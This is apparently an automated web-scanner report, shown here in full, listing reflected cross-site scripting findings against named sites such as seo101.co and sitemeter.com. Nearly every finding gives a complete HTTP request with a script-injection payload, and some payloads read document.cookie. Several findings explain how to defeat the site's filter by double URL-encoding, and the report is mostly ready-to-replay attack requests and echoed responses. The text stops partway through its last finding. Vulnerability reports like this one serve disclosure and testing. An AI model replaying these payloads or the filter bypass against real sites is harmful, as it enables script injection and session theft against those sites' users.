GA_googleSetAdContentsBySlotForSync({"ServerInsiders-TopMost-AdUnit5c027<script>alert(1)</script>d2c9d934be8":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 1e941%0aalert(1)//a64e8b16e22 was submitted in the url parameter. This input was echoed as 1e941 alert(1)//a64e8b16e22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml1e941%0aalert(1)//a64e8b16e22&container=peoplesense&parent=http://saratogaindecline.blogspot.com/&mid=1&view=profile&libs=google.blog&d=0.556.7&lang=en&communityId=05889504503058521941&caller=http://saratogaindecline.blogspot.com/2011/02/transparency-and-nxivm.html HTTP/1.1 Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 198b1'%3balert(1)//ec0fe0a2900 was submitted in the site parameter. This input was echoed as 198b1';alert(1)//ec0fe0a2900 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/counter.asp?site=s46seo101198b1'%3balert(1)//ec0fe0a2900 HTTP/1.1 Host: s46.sitemeter.com Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 20 Mar 2011 17:13:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7316 Content-Type: application/x-javascript Expires: Sun, 20 Mar 2011 17:23:42 GMT Set-Cookie: IP=173%2E193%2E214%2E243; path=/js Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58f06'%3balert(1)//280effdb020 was submitted in the site parameter. This input was echoed as 58f06';alert(1)//280effdb020 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /js/counter.js?site=s46seo10158f06'%3balert(1)//280effdb020 HTTP/1.1 Host: s46.sitemeter.com Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 20 Mar 2011 17:13:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7316 Content-Type: application/x-javascript Expires: Sun, 20 Mar 2011 17:23:58 GMT Set-Cookie: IP=173%2E193%2E214%2E243; path=/js Cache-control: private
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload c5cde</title><script>alert(1)</script>79857da5316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde</title><script>alert(1)</script>79857da5316 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title><script>alert(1)</script>79857da5316 SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff125"><script>alert(1)</script>977dd139795 was submitted in the REST URL parameter 1. This input was echoed as ff125\"><script>alert(1)</script>977dd139795 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxff125"><script>alert(1)</script>977dd139795 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 66c2d><script>alert(1)</script>659beb1f019 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C66c2d><script>alert(1)</script>659beb1f019/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a22"><script>alert(1)</script>be6b50741a2 was submitted in the REST URL parameter 1. This input was echoed as a3a22\"><script>alert(1)</script>be6b50741a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Ca3a22"><script>alert(1)</script>be6b50741a2/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47dd0</script><script>alert(1)</script>5fe6e9ac091 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C47dd0</script><script>alert(1)</script>5fe6e9ac091/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 56312%253balert%25281%2529%252f%252fd47ddd65a86 was submitted in the REST URL parameter 2. This input was echoed as 56312;alert(1)//d47ddd65a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C56312%253balert%25281%2529%252f%252fd47ddd65a86/css/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <56312;alert(1)//d47ddd65a86/css/default.css SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 5fc5e><script>alert(1)</script>c3566bfcb5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/5fc5e><script>alert(1)</script>c3566bfcb5f/css/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</5fc5e><script>alert(1)</script>c3566bfcb5f/css/default.css SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65666"><script>alert(1)</script>0d80a9b1481 was submitted in the REST URL parameter 2. This input was echoed as 65666\"><script>alert(1)</script>0d80a9b1481 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C65666"><script>alert(1)</script>0d80a9b1481/css/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <65666\"><script>alert(1)</script>0d80a9b1481/css/default.css seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b1236%253balert%25281%2529%252f%252f15c28f5c4bc was submitted in the REST URL parameter 3. This input was echoed as b1236;alert(1)//15c28f5c4bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/cssb1236%253balert%25281%2529%252f%252f15c28f5c4bc/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </cssb1236;alert(1)//15c28f5c4bc/default.css SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cbc2"><script>alert(1)</script>0b7ff5a2d05 was submitted in the REST URL parameter 3. This input was echoed as 7cbc2\"><script>alert(1)</script>0b7ff5a2d05 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css7cbc2"><script>alert(1)</script>0b7ff5a2d05/default.css HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </css7cbc2\"><script>alert(1)</script>0b7ff5a2d05/default.css seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c04b"><script>alert(1)</script>825682d9e69 was submitted in the REST URL parameter 4. This input was echoed as 8c04b\"><script>alert(1)</script>825682d9e69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css8c04b"><script>alert(1)</script>825682d9e69 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </css/default.css8c04b\"><script>alert(1)</script>825682d9e69 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce8fc%253balert%25281%2529%252f%252f374e2009f0a was submitted in the REST URL parameter 4. This input was echoed as ce8fc;alert(1)//374e2009f0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.cssce8fc%253balert%25281%2529%252f%252f374e2009f0a HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </css/default.cssce8fc;alert(1)//374e2009f0a SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40d2f</script><script>alert(1)</script>bb4f5014ef6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C40d2f</script><script>alert(1)</script>bb4f5014ef6/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload fcc91><script>alert(1)</script>be03c1556d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cfcc91><script>alert(1)</script>be03c1556d9/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a5c4"><script>alert(1)</script>a2ee812211f was submitted in the REST URL parameter 1. This input was echoed as 6a5c4\"><script>alert(1)</script>a2ee812211f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C6a5c4"><script>alert(1)</script>a2ee812211f/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5094"><script>alert(1)</script>a62e3e17745 was submitted in the REST URL parameter 2. This input was echoed as c5094\"><script>alert(1)</script>a62e3e17745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cc5094"><script>alert(1)</script>a62e3e17745/img/favicon.ico HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <c5094\"><script>alert(1)</script>a62e3e17745/img/favicon.ico seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce0e4%253balert%25281%2529%252f%252f0b5546c25c5 was submitted in the REST URL parameter 2. This input was echoed as ce0e4;alert(1)//0b5546c25c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cce0e4%253balert%25281%2529%252f%252f0b5546c25c5/img/favicon.ico HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <ce0e4;alert(1)//0b5546c25c5/img/favicon.ico SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 501d0><script>alert(1)</script>f7e32a34d92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/501d0><script>alert(1)</script>f7e32a34d92/img/favicon.ico HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</501d0><script>alert(1)</script>f7e32a34d92/img/favicon.ico SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 80276%253balert%25281%2529%252f%252f05cde4b08ac was submitted in the REST URL parameter 3. This input was echoed as 80276;alert(1)//05cde4b08ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img80276%253balert%25281%2529%252f%252f05cde4b08ac/favicon.ico HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img80276;alert(1)//05cde4b08ac/favicon.ico SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406b8"><script>alert(1)</script>e23795f9a69 was submitted in the REST URL parameter 3. This input was echoed as 406b8\"><script>alert(1)</script>e23795f9a69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img406b8"><script>alert(1)</script>e23795f9a69/favicon.ico HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img406b8\"><script>alert(1)</script>e23795f9a69/favicon.ico seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5070e%253balert%25281%2529%252f%252fc119c4d5a26 was submitted in the REST URL parameter 4. This input was echoed as 5070e;alert(1)//c119c4d5a26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
